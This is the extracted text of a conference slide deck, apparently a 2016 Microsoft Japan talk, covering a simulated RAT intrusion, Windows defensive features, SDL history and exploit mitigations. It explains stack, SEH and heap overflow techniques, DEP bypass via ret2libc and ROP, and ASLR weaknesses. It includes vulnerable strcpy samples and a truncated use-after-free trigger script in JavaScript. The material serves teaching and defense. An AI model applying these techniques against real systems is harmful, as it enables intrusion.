SlideShare a Scribd company logo

ARC-006_サイバー セキュリティ、IT Pro、開発、経営 それぞれの視点

D
decode2016

ARC-006_サイバー セキュリティ、IT Pro、開発、経営 それぞれの視点

Technology
1 of 83
Download to read offline
ROOM L
 Chief Security Officer ?Advisor Officer ? Chief Information Officer @security corp. Monitor SOA KPI Think Security from IT and daily life Technology CIA PDCASROI Chief Security Advisor  高橋 正和  日本マイクロソフト株式会社 チーフセキュリティアドバイザー
0 2 4 6 8 10 12 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 1978 1979 1980 1981 1982 1983 1984 1985 1986 1987 1988 1989 1990 1991 1992 1993 1994 1995 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 日本におけるインターネット普及率とYahoo/Amazon(米国)の売上の推移 人口普及率 Yahoo売上推移 Amazon売上推移 愉快犯 経済的目的 情報/工作 目的 One Executable Combined executable with C&C ハクティ ビズム
*1 Risk and responsibility in a hyper connected world: Implications for enterprises January 2014 *2 Verizon 2013 Data Breach Investigation Report *3 Ponemon Institute Releases 2014 Cost of Data Breach *4 WSJ Symantec Develops New Attack on Cyberhacking 2014/5/4 *5 エフセキュアブログ アンチウィルスは死んだ? 2014/5/14 90% 企業の約7割はセキュリティ 事故を経験 9割は未知の脅威 が侵入済み*2 200日以上 攻撃者が検出されるまでに 被害者のネットワーク内に 潜伏している 中央値の日数は 200 日を超える 4.2億円 企業が被るデータ侵害の 平均コスト *3 45% 世間一般的に言う アンチウイルスは、 ここ5年以上も絶望的*5 わずか45%しか 検知できない *4
8 マイクロソフトのIT環境 100ヵ国+ 15万人 60万台+ AVの最新のリアルタイム検知適用率 98% 検出200万件 検出 7.0 件/年 感染 41件 感染 1/7300台/年 2016年7月-12月 (出典SIR20) セキュリティのパラドックス 対策が出来ていると、攻撃を把握できる 対策が出来ていないと、攻撃が把握できない
9
DC 1 IT管理者 PC メール サーバー 秘秘 ファイル サーバー 秘秘 ファイア ウォール 攻撃者 Internet 標的PC Main console rat Ratからの接続 Web サーバー Ratのリンクを メールで送信 リンクのクリック でRatがダウン ロードされる • マルウエアが検知で きない • 侵入したマルウエア が特権を持って実行 される ● 侵入成功 RATコンソール
DC 1 IT管理者 PC • FileShare メール サーバー 秘秘 ファイル サーバー 秘秘 ファイア ウォール 攻撃者 Internet 標的PCxx.exe File Manager ファイルの転送 (双方向で転送可能) Main console rat Ratからの接続 • 任意のファイルに アクセスができる 秘秘 RATコンソール
DC 1 IT管理者 PC 2 • FileShare メール サーバー 秘秘 ファイル サーバー 秘秘 ファイア ウォール 攻撃者 Internet 標的PC > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd xx.exe xx.exe > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd Command prompt rat File Manager ファイルの転送 (双方向で転送可能) リモートからの コマンド実行 Main console rat Ratからの接続 xx.exe File共有を使って 標的PCから攻撃コ ツールをコピー ファイルサーバー上で xx.Execが実行される • 特権が必要な コマンドが実行できる • 特権が必要な コマンドが実行できる • 認証情報が搾取できる • 特権でログオン をしている RATコンソール
DC 1 IT管理者 PC メール サーバー 秘秘 ファイル サーバー 秘秘 ファイア ウォール 攻撃者 Internet 標的PC > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd > Xxexec DC xx.cmd xx.exe xx.exe > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd > Xxexec DC xx.cmd Command prompt rat File Manager ファイルの転送 (双方向で転送可能) リモートからの コマンド実行 Main console rat Ratからの接続 ファイルサーバー 経由でDCでコマンド を実行 ファイルサーバー上で xx.Execが実行される 3 xx.exe この状態では、防ぐすべがない RATコンソール
DC 1 IT管理者 PC メール サーバー 秘秘 ファイル サーバー 秘秘 ファイア ウォール 攻撃者 Internet 標的PC > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd > Xxexec DC xx.cmd > Mail –f hkai@contoso.co.jp xx.exe xx.exe > DIR > Cmd.exe xx.exe > Xxexec fileserver xx.cmd > Xxexec DC xx.cmd > Mail –f hkai@contoso.co.jp Command prompt rat File Manager ファイルの転送 (双方向で転送可能) リモートからの コマンド実行 Main console rat Ratからの接続 社長のアカウントを 偽装して、メールを送信 4 xx.exe この状態では、防ぐすべがない RATコンソール
15
① メールサーバ・GW ・メールサーバ・GWでマルウエアを 発見できず、メールを通過させている DC (認証サーバ) 1 2 • FileShare ファイル サーバー 秘秘 3 攻撃者 Internet 標的PC 秘秘 0 4 ② PC ・AVは検知・駆除せず ・RATのインストールに成功 ・外部からの操作が行われた ・パスワードによるデータ保護 ③ サーバー・ITインフラ ・PCなどの統制 5 ⑤ DC:ID管理・認証サーバ ・IDやPCなどの設定を管理する ドメイン管理者権限を奪取 ④ファイルの転送 ・ファイル転送機能等で外部へ 秘秘 ファイア ウォール ①攻撃の検知・防御 ②PCやサーバーの 権限・設定 ③適切な情報保護 ④システム的な統制と モニタ(監視・監査) ⑤教育・啓発・訓練 必要とされる視点 ネットワーク:PC等 に到達する攻撃を減少 させる ホスト:最新の攻撃を 検知しやすい環境 検出:ネットワークや ログから攻撃を検知・ 検出する マルウエアが動作しな い、他のPCやサーバ に侵入が困難なシステ ム・設定を実装する 特に、認証サーバーの 設定には配慮する ファイル(データ)を 盗まれても、情報が漏 れないような暗号を 使った保護を、多段階 で行う PCやサーバ、ネット ワーク接続を、一括し て管理できる仕組みを 構築する この仕組みに基づいた モニタを行い、監視や 監査の元データとする 利用者への教育は不可 欠、管理者に対する教 育も忘れずに行う 事故を想定した訓練を 定期的に実施すること も重要 事件の概要
敵を知る:攻撃指令 #2015-02-20 ハッカー宣言 • 目的のためには手段を選ばない • できるだけ楽な方法で攻撃する • 法律や規制は関係ない • 成功するまで続ける • 失敗を恐れない(失敗のコストが安い) • 時間をかけることを厭わない • CONTSO社が、ID-SEC社を買収する と噂されている。 • この買収が実現した場合、ID-SEC社 の株価は間違いなく上昇する • CONOTO社に侵入し、買収金額と、 発表の日程を盗み出せ • 市場を混乱させるために、その情報を 社長名義のメールでメディアにばらま け 攻撃にあたっての初期情報 • CONTSO社 • ITソフトの大手企業 • http://www.contoso.co.jp/ • ID-SEC社 • 認証技術に特化したITセキュリティベンダー • ID-SEC者が販売する次世代認証技術は、市場を変えるといわれている。 • ネットワーク • 外部から接続ができるのは、DMZのWebサーバーとメールだけである。 • 社内から社外に対する通信も、メールとWeb以外はすべてブロックされ ている • 標的リスト • 社長 林 櫂 hkai@contoso.co.jp • 人事部長 渋谷 あきこ sakiko@contoso.co.jp • 総務部長 大黒 俊英 otoshihide@contoso.co.jp • IT技術者 尾野 里佳子 orikako@contoso.co.jp • サポート窓口 support@contso.co.jp • 広報窓口 pr@contso.co.j • メディア • YAMN新聞 社会部 soc@yamn-shinbun.co.jp 18 標的 PC
19
https://blogs.technet.microsoft.com/jpsecurity/2015/05/14/local-administrator-password-solution-laps/ キッティングで使用したLocal Adminの パスワードをランダムに変更する
https://www.youtube.com/watch?v=pg26t5TxDHE SafeLink (ATP: Advanced Threat Protection) Safe Attachment (ATP: Advanced Threat Protection) 保護されビュー (Office 2016/2013/2010)
Secured Boot and Measured Boot: Hardening Early Boot Components Against Malware https://technet.microsoft.com/en-us/windows/dn168167.aspx 厄介なマルウエア(rootkit) •Firmware rootkits. PCのハードウェア上に存在するrootkit •Bootkits. ブートローダーを書き換えて、OSよりも先に起動されるrootkit •Kernel rootkits. OSの一部を改版するrootkit. 常にOSの一部として起動. •Driver rootkits. PC上のハードウェアドライバーとして存在するrootkit Windows 8以降の対策 •Secure Boot. UEFIとTPMにより、信頼されたブートローダーである事を保証. •Trusted Boot. スタートアッププロセスのすべてのコンポーネントを ロードする前に、改版されていないことを検証. •Early Launch Anti-Malware (ELAM). ELAM はドライバーがロードされる前に起動され、ドライバーのチェックを行う. •Measured Boot. PCのファームウェアがブートプロセスを記録し、 信頼できるサーバーでPCのブートプロセスを検証する 鍵となるハードウェア •Unified Extensible Firmware Interface (UEFI) •Trusted Platform Module (TPM) 万一、マルウエアに感染した場合でも、OSから上だけの対処すればOK Windows 8以降
アクセス可能なユーザーと、アクセスの種類(表示、 印刷、転送等)が、ファイルに組み込まれ、高度な暗 号により保護をしている。 ファイルにアクセスをするには、ファイルを開く際に 認証を行い、復号用の証明書を取得する必要がある。 パスワードによる保護は、ユーザー任せである点、パ スワードの強度が保証できない点、一度パスワードが わかると、パスワードが解除される点などから、十分 な保護策ではない
5 認証を行ったIPアドレスをマップすることで、 ファイルを追跡することが可能 該当するファイルに対して、複合データを渡さな いように設定することで、暗号を解除することが できなくなる
外部のサービス Home OOF Potentially Malware VSM: (Virtual Secure Mode) LAPS (Local Administrator Password Solution) アクセス方法の制御 (ネットワーク・ローカル) アカウントの認証 ボリュームの 保護 ファイルの保護 データの保護 権限のコントロール ID ①リスト型攻撃対策 Hello+Passport(FIDO) 社内ネットワーク ③Pass-the-Hash対策 VSM / LAPS 秘 秘 秘 1 3 2 ④認証と紐づいた情報保護 RMS/Enterprise Guard ③’ VSM 秘4 ②Malware対策 ATP/ WhiteList対策 White Black Potentially Malware ↑ White List Approach Black List Approach ↓ Local SecurityAuth Service Windows Apps VirtualTPM Hyper-Visor Code Integrity Virtual Secure Mode (VSM) AppLocker Device Guard ②’Rootkit対策 Secure boot • Secure Boot • Trusted Boot • Early Launch Anti- Malware • Measured Boot 管理者権限を奪取され ても、認証情報を保護 するための対策 Webサービスから 認証情報を盗まれても、 悪用を防ぐための対策
https://blogs.technet.microsoft.com/jpsecurity/2016/03/28/%e5%8f%82%e8%80%83%e8%a8%b 3-windows-10-%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3/
システム的な統制:ADを中心としたIT管理基盤(MS IT) IDとアクセス管理 ホスト アプリケーション データネットワーク物理的 管理・監査 27
INTERNET IPsec Corporate intranet SecureNet Important Servers Boundary Machine Infrastructure DNS Wins DHCP DC No Compliant Machine Mac/*NIX XBOX LAB Tablet phone Authorized PC Unauthorized PC 28 ACL リモート アクセス環境におけるセキュリティ強化へのマイクロソフトの取り組み http://technet.microsoft.com/ja-jp/library/bb735234.aspx DirectAccess の機能: http://www.microsoft.com/ja-jp/server-cloud/windows-server/directaccess-features.aspx Authorized PC IPsec Unauthorized PC • 端末間、端末 / サーバー間の接続を、 IPsec を使ったロジカル セグメンテー ションで構築 • Authorized な端末間でしか、接 続ができない • 無線 LAN の場合も、802.1x を 使い、証明書を利用し端末の接続 許可と排除を制御 • ユーザー認証の以前に、デバイス レベ ルでネットワーク接続の可否を制御 • 例外的な許可ルールが容易 • DirectAccess への展開により、外 部からの接続についても、イントラネッ トと同様に制御が可能 ドメインアカウントでログオンをしていない端末・ユーザーのイントラネットへのアクセスを防ぐ 利用者がドメインアカウントでログオンすることを促し イントラネットにアクセスする全てのPCに対して、 適切なセキュリティ対策が強制できるようにする
設計 セキュリティに関するアーキテク チャと、設計要件の規 定 弱い暗号の禁止 ソフトウェアのアタックサーフェスの ドキュメント化 脅威のモデル化 設計上のリスクを軽減す る 開発ツールと技術 静的なコード分析ツール 群 問題のあるAPIの禁 止 DiD プロテクションでの ビルド (/GS, HeapTerm, /NOEXECUTE, and ASLR) XSS 対策ライブラリの 利用 テストの為のツールと技術 Fuzzing アタックサーフェス分析 セキュリティコードレビュー 集中的なセキュリティテスト ペネトレーションテスト レスポスの計画の立案 Security Push 出荷基準への準拠 Final Security Review セキュリティチームによる独 立したレビュ SDL適応情報のド キュメント化 出荷と導入 承認 セキュリティレスポンス 計画の立案と実施 開発に対するフィード バックループ 原因の分析 教育とトレーニング セキュアな開発を 実施できるように 教育する 開始要件 セキュリティアドバイザの 配属 開発ツールと環境の用 意 セキュリティマイルストーンの設 定 要件定義 設計 実装 検査 出荷 対応・対処
Windows Products and Security: never end story 1990 1991 1992 1993 1994 1995 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 • Concept • Melissa • I LOVE YOU• SolarSunrise • DDoS on DNS root • MyDoom •NetSky •Bagle Client-server/PC-LAN Internet Computer Crimes Protocol Weaknesses/Remote Buffer overflow • SPAM Mails • Spyware • Phishing proliferated Cyber Crimes • WiityWorm• Agobot • Sobig • Yahoo DDoS • Linux • MOSAIC • Net BSD •Free BSD •NetWare • Targeted Attack • Huge Data Leak •Mac OS-X • JP Gov. HP • AT&T Janes •IIJ • ADSL• テレホーダイ • Ping of Death • Yahoo •eBay • Google • Winny • Winny Incident • Brown orifice • Attacks for JP Soft Virus via Media • INN/phf • Back Orifice • statd,named,popd •DDoS tools Broad band Network Virus via E-Mail Worm communizationWorm in the wild Document / Local BO • Netscape • Virus Creation Laboratory • Michelangelo • Netcat • YouTube • Skype • Amazon • mySpace • mixi • Blog • First SPAM • Java • JavaScript • Real Player• PDF • Little Black Book • Windows 3.0 • Windows 95 • Windows 98 •NT3.1 • NT 4.0 •Win 2000 •Win XP SP2 •Win Vista •Win Server 2003 •Win XP •Win Server 2008 •Internet Explorer • Sasser ADHOC /Product/Marketing TwC (Trustworthy Computing) STF W2K Pen- testPREfix XPPREfast .NET MSRC (secure@microsoft.com) 2003 SWI(Secure Windows Initiative) • Slammer • Blaster SDL Security Development Lifecycle OF2003 SQL2K3 EXC2K-3 Etc.. Single User OS Multi User OS MSRC • secure@Microsoft • Windows Update • メディア対応の一本化 STF: 有益な知見を得るが実施されず SD3+C WS2K: 多数のセキュリティ機能を実装、 しかしバグの多さが問題 SWI: 製品部門の教育、設計とコードレ ビュー、問題の修正 Ship Stopper XP: 魚を釣る代りに釣り方を教える Security Day/Bug bash .NET: First Security Push W2K3: 8500人の開発を停止 良好な状態での出荷 1年以上の出荷遅れ 毎週水曜にセキュリティ更新 (2002年5月) 毎月第二火曜にセキュリティ更新 (2003年11月) SDL: Ad hocからエンジニアリングへ 全ての製品がSDL必須に 年に二回、SDLを更新 • CodeRed • Nimda SecurityPush +FinalSecurityReview WIndows Update (1998年7月)
• 主な出典:Matt Miller • A Brief History of Exploitation Techniques & Mitigations on Windows • http://www.atmarkit.co.jp/ait/series/1568/
はじまりは 1988年 インターネットワーム(Morris worm) 事件の概要 • 単に感染を繰り返すものであったが,当時インターネットに接 続されていたコンピュータの10%(6000台)に直接的な被害 • インターネットからコンピュータを切り離したサイトも多かっ たため、結果として,インターネットを大きな混乱に陥れた • 学生は放校処分となり、1990年には裁判で有罪とされた • 判決は $10,000 の罰金、3年間の保護観察および 400時間の公共奉仕活動の義務だった • 侵入先から情報を収集し、次の侵入先を決めるメイン部 • メイン部に先立って送り込まれるブートストラップ部 • Unix セキュリティホール • rコマンド • sendmail デバッグオプション • finger デーモンの入力バッファ • パスワードの推測 1988年 インターネットワーム事件 http://www.soi.wide.ad.jp/class/20020008/slides/08/21.html UNIX MAGAZINE 1989.10 UNIX Communication Notes 16 Worm,Worm,Worm 対策・対処 • 1988年 CERT/CCの設立(Computer Emergency Response Team / Coronation Center) • インシデントに対するSingle Point of Contact • 1989年10月に出現したWankワームは,組織,国にまたがっ たコミュニケーションの欠落が適切な対応の推進を妨げたと いう教訓を残し,緊急対応チームの組織間ならびに国際間連 携を目的としたFIRST(Forum of Incident Response and Security Teams)の組織化につながった。 • 国内では,1996年にJPCERT/CC(Japan Computer Emergency Response Team/Coordination Center) • 非常に面白く、現在にも通じる攻撃手法を多数悪用している • 今回は、fingerデーモンに使われた Buffer Overflowについて 着目する
Stack overflow ゼロデー攻撃をめぐる攻防
Stack Overflow (Buffer Overflow) 脆弱性に対する攻撃 コード(Shell code) 攻撃実行部分 ドキュメントファイル .doc, .pdf など ① 脆弱性を使って、ドキュメント中に埋め込んだ、攻撃プログ ラムのアドレスにジャンプする ② 攻撃プログラムが、ドキュメントを取り扱うプログラムの一 部として実行される Buffer Overflow ドキュメントの読み込み プログラムの流れ Data Segment 1 2 Code Segment 引数 EIP EBP ローカル変数 引数 EIP EBP ローカル変数 Lower address Higher address 現在実行中の関数が使 用しているスタック 現在実行中の関数を呼 び出した関数が使用し ているスタック Buffer Overflow EIP - Instruction Pointer 次に実行されるCPU命令のアドレ スを指す。CALL命令実行時に、スタック上に保存される。 JUMP系の命令はEIPレジスタを直接書き換える。 EBP - Base Pointer スタックフレーム上で、関数の引数や ローカル変数を参照する時に使う基準点となるアドレスを格 納する32ビットレジスタ。ESPレジスタと違い、EBPレジス タは手動で変更する。「フレームポインタ(Frame Pointer)」 とも呼ばれる。
基本的なコンピューターの動作 (ノイマン型・Stored Programing Method) アドレス 機械語 ニーモニック/逆アセンブル EIP レジスタ ESP スタック
スタック上の関数の引数とローカル変数の例 012fe94 00409068 EIP: Return address 012fe98 00000003 Handle = 3 012fe9c 0012fea8 Char *buf 012fea0 00000400 Len = 1024 012fea4 00000003 3 012fea8 43424140 Buf[16] 012feac 47464544 012feb0 4B4A4948 012feb4 4F4E4D4C 012feb8 00000010 16 012febc 00000400 1024 012fec0 0012fee4 EBP 012fec4 0040101a EIP: Return address 012fec4
VS2002:GS Cookie 引数 EIP EBP ローカル変数 Lower address Higher address GS Cookie Buffer Overflow Visual Studio 2002で、 関数から戻る際に、GS Cookieをチェックし、 変更されていれば、 異常終了するようにした GS Cookieの回避策 • 関数から戻るときにチェックするので、 関数から戻る前に攻撃を完了する。 • GS Cookieを上書きすることができた。 void vulnerable(char *in, char *out) { char buf[256]; strcpy(buf, in); // overflow! strcpy(out, buf); // out is corrupt return; //canary checked } この例では、char *outとして渡されるアドレスに、Buffer Overflow により、任意のデータを書きこむことができる。 しかし、この関数(vulnerable)のGS Cookieは上書きされていないの で、Overflowを検出することが出来ない。
/GSの改良 引数 EIP EBP ローカル変数 Lower address Higher address GS Cookie • 引数のコピーをローカル 変数としてコピーする • 配列をGS Cookieの直前 に配置する SEH Overwrite void vulnerable(char *ptr){ char buf[128]; try {strcpy(buf, ptr); … exception … } except(…) { } } 配列 引数の コピー SEHOP • 例外処理を書き換えることにより、任意のコードを実行する Next Handler app!_except_handler4 k32!_except_handler4 ntdll!_except_handler4 0xffffffff Next Handler Next Handler Shell CodeNext Handler Buffer Overflow
SEH Overflow 引数 EIP EBP ローカル変数 Lower address Higher address GS Cookie • 関数内で例外処理をしている場合、 例外処理アドレスは、ローカル変 数の直後におかれる。 • このため、Buffer Overflowによ り、例外処理ハンドラー(SEH: Structured Exception Handler ) を書き換えることができる。 • GS Cookieがチェックされる前に 例外を発生させることができれば、 Overflowによりセットしたアドレ スに制御を移すことができる。 void vulnerable(char *ptr){ char buf[128]; try { strcpy(buf, ptr); … exception … } except(…) { } } Buffer Overflow 配列 引数の コピー Next Handler 例外処理 Exception Registration Record Normal SEH Chain Next Handler app!_except_handler4 k32!_except_handler4 ntdll!_except_handler4 0xffffffff Next Handler Next Handler Next Handler 0x7c1408ac ox414106eb Corrupt SEH Chain pop eax pop eax ret この場合、eaxにセットされているアドレスに、戻る (ジャンプする)ことになる
Safe SEH app!eh2 app!eh1 Visual Studio 2003で/SafeSEHオプションを追加 コンパイル時に、安全な(プログラムが明示的に設 定した)例外処理ハンドラーのテーブルを作成する。 例外処理を実行する際に、例外処理(Handler)のア ドレスが、テーブル中にある事をチェックし、存在 しない場合はプログラムを終了する SEH Overwrite Part II プログラムの実行イメージ Next Handler app.exe kernel32.dll ntdll.dll app!eh2 app!_except_handler4 Safe SEHtable app!_except_handler4 app!_main+0x1c テーブル中に存在するので、 実行される テーブル中に存在しないので、 実行されない …… Thirdparty.dll ntwrap.dll SafeSEHは、/SafeSEHオプションでコンパイルされたモジュー ルだけで有効で、/SafeSEHを使っていないモジュールが、実行 イメージに展開される場合、そのモジュール中にあるアドレスを、 例外処理として登録することが出来てしまう。 /SAFESEHで コンパイル /SAFESEHなしで コンパイル /SAFESEHなしで コンパイル
Dynamic SafeSEH GSとSaefeSEHのまとめ 正常なSHEチェーン Next Handler app!_except_handler4 k32!_except_handler4 sehprot!_validation_eh Next Handler Next Handler 上書きされたSHEチェーン Next Handler app!_main+0x1c 0x41414141 ???? Dynamic SafeSEHでは、例外処理テーブルの最後に、評 価用の値をセットする。 Nextポインタが上書きされると、評価用のアドレスへのリ ンクが切れるため、改ざんを検知することができる。 • GSとSafeSEHは、スタックベースのオー バーフローに対する有効な緩和策である。 • ただし、この緩和策を有効にするためには、 アプリケーションを再コンパイルする必要 がある。 • 古いプログラムや、3rd パーティのアプリ ケーションを守るためには、追加的な緩和 策が必要である。
Heap overflow ゼロデー攻撃をめぐる攻防
blink Buffer flink(1010) blink(1030) flink(1020) blink(1000) flink(1000) blink(1020) Buffer Buffer flink(1030) blink(1010) Buffer blink Buffer flink(1020) blink(1030) flink(1000) blink(1020) Buffer flink(1030) blink(1000) Buffer Free 48 1010 1030 flink blink 1020 1000 1030 1010 1000 1020 1000 1010 1020 1030 Free  1010 1030 flink blink 1020 1000 1030 1010 1000 1020 1000 1010 1020 1030 実際には連続したアドレス 1020 1000 Heapの仕組み Heap Freeの概要
Heap Overflow 任意のアドレスに任意の4バイトを書きこむ 49 1010 1030 flink blink 1020 1000 1030 1010 1000 1020 1000 1010 1020 1030 Free  1010 1030 flink blink 1020 1000 1030 1010 1000 1020 1010 1030 flink blink 1020 1000 1030 1010 1000 1020 1020 1030 flink blink 2000 4141 1030 1000 1000 1020 1000 1010 1020 1030 1010 1030 flink blink 1030 1010 1000 1020 2000 2000 1000 1010 1020 1030 Free  1000 1010 1020 1030 Heapの状態と、正常なFree 関数ポインターなどを書き換える Heap Overflowによる、任意のアドレスへの書き込み 1020 1000 1020 10002000 4141 4141 Heap Overflow 2000
Heap対策 flink 1 blink 1 flink 2 blink 2 flink 3 blink 3 flink 4 blink 4 Cookie(chunk) Cookie(chunk) Cookie(chunk) Cookie(chunk) • 双方向リンクのチェックを行 うように修正 Windows 7では、カーネル プールについても適用 • Flink/Blinkの前段にChunk を設置し、Chunkが書き換 えられている場合、 Overflowが起きていると判 断する Windows XP SP2/WS2003 Preventing the exploitation of user mode heap corruption vulnerabilities http://blogs.technet.com/b/srd/archive/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities.aspx Windows Vista, WS 2008 Windows 7 • Lookaside, array listを廃止し、 LFH(Low Fragmentation Heap)を利用 • Heapエントリーを乱数とのXOR • ASLRによりベースアドレスをランダム 化(5bit) • Heap Structure中の関数ポインタを乱 数とXOR • Termination on heap corruptionがオ ンの際には、Heap構造に異常を見つけ ると、プロセスを終了する ~flink1 ~ blink1 ~ flink2 ~ blink2 ~ flink3 ~ blink3 ~ flink4 ~ blink4 Cookie(chunk) Cookie(chunk) Cookie(chunk) Cookie(chunk) Windows Vista以降で採用された Heap対策を破る攻撃は確認されていない E->flink->blink == E->blink->flink == E ASLR
DEPをめぐる攻防 (DEPとASLR) ゼロデー攻撃をめぐる攻防
ハードウェア DEP 引数 EIP EBP ローカル変数 Lower address Higher address Padding Address of Jmp esp Shellcode BufferOverflow 引数 EIP EBP ローカル変数 Lower address Higher address ret2libc: return to libc Stack Segment Address of system fake Return address address of “cmd” Arg2 Arg1 Padding BufferOverflow API API • 攻撃コードは、一般に 書き込み可能なメモ リー領域にShellcodeを 書きこむ • このため、スタック領 域などを、non- executableにセットす ることで、Shellcodeの 実行を止めることがで きる。 • Visual Studio 2005で、 フラグをセットしてコ ンパイルする必要があ る。 • NX Stack/heapは、この領域に書きこまれたコードの実行 に対してだけ有効 • ライブラリーコードは、実行可能領域にあるため、DEPで は防ぐことが出来ない。 • ret2libcだけでは、それほど有効な攻撃は出来ないのだが、 ret2libcを使って、DEPを無効にするAPIを呼び出して、そ の後にスタック等に展開されたShellcodeを実行する。 DEP
Return to Libc / Return Oriented Program Return to Libc • ASLRにより、ロードアドレス、ヒープアドレスをランダマイズ • スタック・ヒープ領域に展開したShell Codeではなく、ライブ ラリのアドレスを、リターンアドレスにセットする。 • スタックに任意のパラメータをセットすることで、APIを任意の パラメーターで呼び出すことができる。 • 正規のAPIを利用するので、DEPで防ぐことが出来ない • ASLRが実装されているシステムでも、ASLRを利用しないモ ジュール(dll等)がある場合、これを利用することで、攻撃を 成功させることができる ROP: Return Oriented Program • コードセグメント中に、自分が実行したいコードと(偶然)同じ インストラクションを持つ部分を探す • リターンアドレスに、そのコードアドレスをセットする • 正規のAPIを利用するので、DEPで防ぐことが出来ない • ASLRが実装されているシステムでも、ASLRを利用しないモ ジュール(dll等)がある場合、これを利用することで、攻撃を 成功させることができる • パラメーターのセットも必要ないため、限定的な条件でも動作し やすい 出典:「Dino Dai Zobi, "Mac OS X return oriented exploitation“ http://trailofbits.files.wordpress.com/2010/07/mac-os-x_roe.pdf
ret2libc: return to libc の攻撃例 Lower address Higher address size of Shellcode Address of Shellcode Address of jmp esp Address of virtual Protect RWX(read/write/exe) Writeable address Shellcode 1 Return from Valnerable function 2 Entry to VirtualProtect 3 Return from VirtualProtect この例では、VitrualProtectを呼び出し、Shellcodeをアサインした 領域を、実行可能にしたあと、Shellcodeにジャンプ(Return)する 1. 脆弱な関数の戻り番地を、Virtualprotectにセットする 2. Entry to VitrualProtectは、Shellcodeを実行可能にするための 引数をセットしている。 3. 戻り番地として、shellcodeのアドレス(Address of jmp esp) をしているので、Shellcodeに制御が移動する。 VirtualProtect 呼び出し側のプロセスの仮想アドレス空間内のコミット済みページ領域に対 するアクセス保護の状態を変更します。 任意のプロセスのアクセス保護を変更するには、VirtualProtectEx 関数を使 います。 BOOL VirtualProtect( LPVOID lpAddress, // コミット済みページ領域のアドレス DWORD dwSize, // 領域のサイズ DWORD flNewProtect, // 希望のアクセス保護 PDWORD lpflOldProtect // 従来のアクセス保護を取得する変数のアドレス ); Return to VirtualProtectを実行するには、NULLバイトが利用できる 必要がある(文字列のオーバーフローでは、通常は利用できない) Windows には、disable NXのAPIがあり、ntdllがこれを呼び出して いるの、このコードを利用することができる。 NtSetInformationProcess[0x22]
Permanent flag DEP(NX)のまとめ • Boot flagによって、アプリケーション が常にNXが有効な状態である事を強制 できる • プロセスから、以下のAPIを呼び出すこ とにより、NXフラグの変更を防ぐこと ができる。 • NtSetInformationProcess[22] with flag 0x8 • しかし、VitualProtectへの緩和策には なっていない • StackやHeap等のメモリーセグメントを、 ハードウェアにより実行不可にすること ができる。 • Ret2libcは、Shellcodeを使うことなく、 マリシャスなコードを実行することがで きる。 • この手法(ret2libc)は、NXを無効にす るために、使うことができる。 • VirtualProtect • NtSetInformationProcess
Address Space Layout Randomization(ASLR) • 攻撃手法は、実行イメージのアドレスに関 する情報の上に成り立っている • リターンアドレスに使うためのアドレス • SHEハンドラーに使うためのアドレス • ライブラリールーチンを呼び出す (ret2libc)ためのアドレス • アドレススペースが、予測できないとした らどうだろうか。 app.exe user32.dll ssleay32.dll ntdll.dll app.exe user32.dll ssleay32.dll ntdll.dll app.exe user32.dll ssleay32.dll ntdll.dll • Address Space Layout Randomization(ASLR) • /dynamicbaseでコンパイルをする必要がある • メモリーロケーションをランダム化する • アドレスは、事前に予測することができなくなる Boot1 Boot2 Boot3
Partial overwrite Lower address Higher address • 上位の2バイトだけがラ ンダマイズされている • 下位の2バイトは、上位 アドレスが違っていても 共通しているため、これ を利用することができる • 0x1446047c 0x14461846 引数 EIP EBP ローカル変数 GS Cookie High Low Buffer Overflow app.exe user32.dll ssleay32.dll ntdll.dll app.exe user32.dll ssleay32.dll ntdll.dll app.exe user32.dll ssleay32.dll ntdll.dll Boot1 Boot2 Boot3 • 全てのバイナリーモジュールが、ASLRを有効にしているとは 限らない • 実行ファイルが、ASLRを無効にしていることも少なく ない • ASLRは、すべての領域がランダム化されたときに、効果を発 揮する ASLRを適用していない モジュールを悪用する EBPローカル変数 EIP Low High Buffer Overflow
Brute Force • VistaのASLRでは、大半のDLLは、ブート時のみに ランダム化される • アドレスに対するBrute Forceが可能かもしれない • Forkを使うデーモン(サービス)はない • つまり、プロセスの再生成が行われない • Vistaのサービスのリスタートポリシーが、これを制限して いる • 多くの場合は、それほど効果的な手法ではない Information disclosure • アプリケーションのバグが、アドレススペース の情報を、攻撃者に知らせる可能性がある。 • これに基づいて、再現性の高いリターンアドレ スを作成することができる。 • イメージファイルのバージョンがわかるだけで、これ が可能となる ASLRまとめ • アドレススペースが予測不能となる • 攻撃コードは、オペレーションコードや他の値 を知ることができなくなる • しかし、まだ弱点がある • Partial overwrite • Brute Force • Information disclosure
Use After Freeと Heap Spray ゼロデー攻撃をめぐる攻防
Use After Freeによる任意データの書き込み<html> <script> 1. // Create ~ 200 comments using the randomly selected three character string AAA, will change data later in an attempt to overwrite var Array1 = new Array(); for (i = 0; i < 200; i++) { Array1[i] = document.createElement("COMMENT"); Array1[i].data = "AAA"; } var Element1 = null; 2. // Function is called by the onload event of the IMG tag below // Creates and deletes object, calls the function to overwrite memory function FRemove(Value1) { Element1 = document.createEventObject(Value1); // Create the object of the IMG tag 3. document.getElementById("SpanID").innerHTML = ""; // Set parent object to null to trigger heap free() 4. window.setInterval(FOverwrite, 50); // Call the overwrite function every 50 ms } 5. // Function attempts to overwrite heap memory of deleted object and then access object to trigger crash function FOverwrite() { buffer = "¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA¥uAAAA~ ¥uAAAA¥uAAAA¥uAAAA"; for (i = 0; i < Array1.length; i++) { Array1[i].data = buffer; // Set comment data to buffer, try to 